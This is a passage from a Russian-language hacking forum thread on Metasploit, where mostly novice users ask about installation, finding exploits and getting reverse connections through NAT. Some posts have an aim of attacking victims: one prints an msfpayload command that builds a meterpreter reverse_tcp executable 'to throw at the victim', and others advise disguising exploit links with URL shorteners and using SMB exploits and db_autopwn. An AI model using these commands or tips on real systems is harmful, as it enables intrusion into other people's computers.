Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Если за NAT то требуется проброс портов настроить в роутере и посмотреть внешний IP для реверсшелла.
     
  2. ConnectOFF

    ConnectOFF New Member

    Joined:
    13 Apr 2011
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    скачал уже под ubuntu)) как установить не знаю)) через VirtualBox норм работать будет?
     
  3. ConnectOFF

    ConnectOFF New Member

    Joined:
    13 Apr 2011
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    не подскажешь офф сайт?)

    спасибо нашел)) http://dev.metasploit.com/redmine/projects/framework/wiki/Install_Ubuntu
     
    #323 ConnectOFF, 24 Apr 2011
    Last edited: 24 Apr 2011
  4. Amoura

    Amoura Elder - Старейшина

    Joined:
    23 Jan 2008
    Messages:
    237
    Likes Received:
    148
    Reputations:
    46

    http://dev.metasploit.com/redmine/projects/framework/wiki/Install_Ubuntu
     
  5. ConnectOFF

    ConnectOFF New Member

    Joined:
    13 Apr 2011
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    установил я msf и не могу найти сами сплоиты в папках.. кто щас пользуется 3.6.0?? подскажите что делать??

    вот что лежит в папке "armitage" "HACKING" "msfconsole" "msfgui" "msfpescan" "plugins" "tools" "data" "lib" "msfd" "msfmachscan" "msfrpc" "README" "documentation" "modules" "msfelfscan" "msfopcode" "msfrpcd" "scripts" "external" "msfcli" "msfencode" "msfpayload" "msfupdate" "test"
     
    #325 ConnectOFF, 24 Apr 2011
    Last edited: 24 Apr 2011
  6. muhyta

    muhyta New Member

    Joined:
    28 Jan 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Code:
    msfc> search эксплоит
    выводит все удовлетворяющие критерию поиска эксплоиты.
     
  7. ConnectOFF

    ConnectOFF New Member

    Joined:
    13 Apr 2011
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    я на самом деле и не знаю какой мне именно надо)) вот висит консоль и не знаю что писать там. Где взять сплоит, как прикрутить начинку и все в этом духе) перечитывал несколько раз первую страницу и не понял где брать начинку и эксплоит и что с ними делать)
     
  8. ConnectOFF

    ConnectOFF New Member

    Joined:
    13 Apr 2011
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    начал пользоваться msfgui вреде все понятно стало)) все нашел) тока вот не пойму куда сохраняется сплоит после всех настроек...
     
  9. NeW

    NeW New Member

    Joined:
    9 Feb 2011
    Messages:
    50
    Likes Received:
    0
    Reputations:
    0
    Думаю, что мало кто будет переходить по ссылке http://10.0.0.1:8080/ . Как можно сделать нормальную ссылку, подскажите пожалуйста.
     
  10. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    заюзай любой сервис коротких ссылок, кроме того есть параметр URIPAPH вроде.
     
  11. NeW

    NeW New Member

    Joined:
    9 Feb 2011
    Messages:
    50
    Likes Received:
    0
    Reputations:
    0
    Спасибо. А есть такие эксплойты, ссылки на которые не надо впаривать, а работают сразу?
     
  12. Pernat1y

    Pernat1y Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    479
    Likes Received:
    79
    Reputations:
    7
    Ога. В ночь с четверга на пятницу тебе нужно сделать татуировку с пентаграммой и айпишником того, кого нужно похекать у себя на заднице.

    PS. Ищи сплоиты под SMB и другие сетевые службы
     
  13. NeW

    NeW New Member

    Joined:
    9 Feb 2011
    Messages:
    50
    Likes Received:
    0
    Reputations:
    0
    Окэй, босс.
    Спасибо :)
    То есть exploit ms06_040_netapi будет работать без впаривания ссылки? В metasploit'e идет как smb exploit.
     
    #333 NeW, 20 May 2011
    Last edited: 20 May 2011
  14. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Будет, если система уязвима.
     
  15. ConnectOFF

    ConnectOFF New Member

    Joined:
    13 Apr 2011
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    а еще можно проверить командой db_autopwn
     
  16. Cherone

    Cherone New Member

    Joined:
    24 May 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    На своем компе под виндой метасплойт установился нормально, но нет выделенного IP. Как это можно обойти?

    Взял голый VPS с debian, установил все зависимости по инструкции с оффсайта, но поставить msf 3.7.1 так и не смог (ни full, ни mini) вечно вылезают разные ошибки...

    Может как то можно организовать бэкконект с промежуточным хостом (через этот vps)? :confused:
     
  17. PomaH9991

    PomaH9991 Member

    Joined:
    10 Nov 2007
    Messages:
    14
    Likes Received:
    21
    Reputations:
    5
    Попробуй сервис no-ip.com
     
  18. POI

    POI Banned

    Joined:
    20 Jun 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Это все круто , но скоро IPV6 , так что о мета еще стоит и подумать . Такое ли большое будущее ...
     
  19. ChandleR

    ChandleR New Member

    Joined:
    15 Oct 2010
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    Допустим ми сделали ехе
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.104.130 LPORT=4444 X > /tmp/7.exe
    кинули на комп жертве, он запускает, и сли стоит фаервол, дальше него дело не пойдет.
    Есть какойто реверс, что б инжектился в процес, например в скайп,или аську?
     
  20. MTV

    MTV New Member

    Joined:
    16 Feb 2011
    Messages:
    180
    Likes Received:
    2
    Reputations:
    0
    Ребят,помогите.Устанавил я Metasploit Framework 3.7.2.Вроде все установилось нормально, но при запуске msfconsole запускается консоль и я там нечего не могу писать!Консоль через некоторые время исчезает.Может я что то не установил?В чем проблема?
    Заранее благодарен.